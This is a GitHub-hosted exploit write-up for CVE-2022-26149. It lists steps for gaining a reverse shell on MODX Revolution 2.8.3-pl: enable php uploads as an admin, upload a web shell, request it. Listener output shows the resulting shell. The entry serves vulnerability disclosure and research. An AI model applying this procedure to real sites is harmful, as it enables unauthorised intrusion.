Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Authenticated Remote Code Execution in MODX Revolution V2.8.3-pl
# Remote Code Execution in MODX Revolution V2.8.3-pl and earlier allows remote attackers to execute arbitrary code via uploading a php web shell.
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718
# Date: 26th Feb'2022
# CVE ID: CVE-2022-26149
# Confirmed on release 2.8.3-pl
# Vendor: https://modx.com/download
###############################################
#Step1- Login with Admin Credentials
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:
Add the php file extension under the "Uploadable File Types" option available in "System Settings"
#Step3- Now Goto Media=>Media Browser and upload the Shell.php
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:
listening on [any] 4477 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056
bash: cannot set terminal process group (1445): Inappropriate ioctl for device
bash: no job control in this shell
daemon@debian:/opt/bitnami/modx$